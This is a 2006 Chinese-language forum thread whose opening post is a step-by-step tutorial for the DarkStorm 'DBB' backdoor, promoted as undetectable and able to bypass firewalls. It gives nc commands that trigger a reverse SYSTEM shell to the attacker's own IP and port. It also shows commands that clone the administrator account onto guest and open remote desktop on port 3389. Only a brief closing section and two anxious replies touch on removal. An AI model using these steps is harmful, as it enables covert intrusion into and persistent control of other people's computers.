广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 2342 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
upside 手机 葫芦墩家族
个人头像
个人文章 个人相簿 个人日记 个人地图
特殊贡献奖 社区建设奖 优秀管理员勋章
头衔:反病毒 反诈骗 反虐犬   反病毒 反诈骗 反虐犬  
版主
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
穿梭于防火墙下的黑马 DBB后门程式
穿梭于防火墙下的黑马 DBB后门程式

今天要为大家介绍的DarkStorm BePassFireWall BackDoor V1.2是一款成功率极高的反弹端口穿透防火墙的后门程式(以下简称DBB),可以穿透99%的防火墙。该后门采用线程插入技术,隐蔽性极高,在系统中以服务形式载入,拥有system许可权,一旦运行,很难将其删除。同时,最重要的是,现在还没有杀毒软体能够查杀它,可以说是现在理想的后门程式了。下面就让我们一起来领略一下DBB的独到魅力吧!
  一、配置后门
  第一步当然是把DBB当回家,在使用后门前,请先用压缩包内的config DarkStorm.exe程式配置后门。双击运行config DarkStorm.exe,打开如图1所示的配置对话窗口,根据提示输入相关数据。其实,该后门支援不经过配置就可直接使用,这时将使用后门的默认配置:反向连接端口是8888,关键字是NOIR,服务名是DNScnsvc。

  小提示:DBB后门服务端由DarkStorm.exe和DarkStorm.dll组成,这两个exe和DLL文件是可以改名的,但是必须要改成同样的名字,比如,可以把exe文件改名为123.exe,那么dll文件也要相应的改名为123.dll。
  二、打开后门
  要运行后门很简单,只要将exe和dll文件上传到远程主机上之后,直接运行exe文件,后门即可被载入。
  小提示:exe文件和dll文件不必一定要放到system32中,但必须在同一文件夹下。
  大家都知道,现在很多情况下主机是在防火墙后面的,如何让后门来逃避防火墙的火眼金睛呢?这就需要用反向连接功能。DBB是通过嗅探激活字符来启动反向连接的,仅支援nc反向连接。
  首先在本地电脑中使用nc监听本地电脑的8888端口,进入命令行状态,运行如下命令: nc -l -p 8888。然后再用nc连接目标主机的任何一个防火墙允许的TCP端口(80/139/445.....),接着再开一个命令行窗口,运行命令:nc 220.202.242.101 139,然后输入激活命令:NOIR:220.202.242.98:8888。其中220.202.242.101为木马服务端IP地址,NOIR为反弹激活字,220.202.242.98:8888为反向连接的IP地址,也就是本机IP地址及端口。如果反向连接成功,就会在本地电脑中得到目标主机的一个系统许可权SHELL(如图2)。

  小提示:本地电脑即接受反向SHELL的系统,必须拥有独立公网IP上网的电脑。另外,由于该后门使用的是无驱动的嗅探,无法嗅探本机对本机发起的数据请求,所以在对本机的测试中,是无法成功的。
  三、轻松操纵
  当成功获取了目标电脑的一个系统许可权的SHELL后,就等于已经手握该台电脑的生杀大权。令人更加欣喜的是,DBB还拥有一些非常实用的控制功能。
  1.帐户克隆
  为了下次能够顺利控制目标电脑,一般的手法就是克隆一个系统许可权的帐户,在这里,使用clone命令就可以轻松克隆一个本地用户。其语法格式为:clone username clonename password,其中,username是被克隆的用户的用户名,一般是administrator;clonename是你要克隆为username的用户名,一般是guest;password是你为克隆用户设置的密码,最长32位。例如,要把Guest克隆为管理员帐户,并且设置密码为snow,就只要运行命令:clone administrator guest snow(如图3)。

  2.开启终端服务
  远程终端服务可以说是最为理想的远程式控制制方式,因此,当成功入侵目标电脑后,大部分人总是想方设法来开启被控电脑的终端服务。虽然说开启3389终端服务的方法有很多,可都是有一定难度的。不过还好,有了该后门,只要用一条命令就可以轻松开启3389服务,其命令为:term port。例如:运行命令“term 3389”(如图4),这样就将开启目标电脑的端终服务,终端服务通讯端口为3389,重新启动电脑即可生效。

  小提示:终端服务只在Windows 2000伺服器以上版本才拥有。
  3.进程管理
  想知道目标电脑运行了哪些程式吗?很简单,运行命令:pslist,这样就可以显示本地所有用户进程和相对应的pid号。如果想结束某一进程的运行,请运行命令:pskill pid,提示:pid指的是进程ID号(如图5)。

  另外,还有诸如Logoff(登出当前用户)、Reboot(重启系统)、Shutdown(关闭系统)、Poweroff(关闭电源)等命令可供使用。
  四、封杀后门
  如果不幸中了该后门,可以通过如下方法来删除。打开注册表编辑器,依次展开如下子键:HKEY_LOCAL_MACHINESYSTEMCurrentControlSet
  Services,找到并删除该子键下的DNScnsvc键(如图6),再重新启动系统即可。若服务名是自己设定的,请删除相关服务名的子键。



爸爸 你一路好走
献花 x0 回到顶端 [楼 主] From:台湾和信超媒体宽带网 | Posted:2006-12-03 02:56 |
紫炎苍龙
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x0 鲜花 x12
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

感谢大大的分享,真是可怕的程式,有解决的办法吗?,有的话请大大再次分享,谢谢啰


献花 x0 回到顶端 [1 楼] From:台湾 | Posted:2006-12-03 20:21 |
patience99
数位造型
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x0 鲜花 x0
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
Re:穿梭于防火墙下的黑马 DBB后门程式
不懂不怕~懂越多真是越可怕!
建议拔掉网路线~.~"


一句鼓励的话 可改变一个人的观念与行为,甚至改变一个人的命运!
献花 x0 回到顶端 [2 楼] From:台湾数位联合 | Posted:2006-12-04 01:28 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.023951 second(s),query:16 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言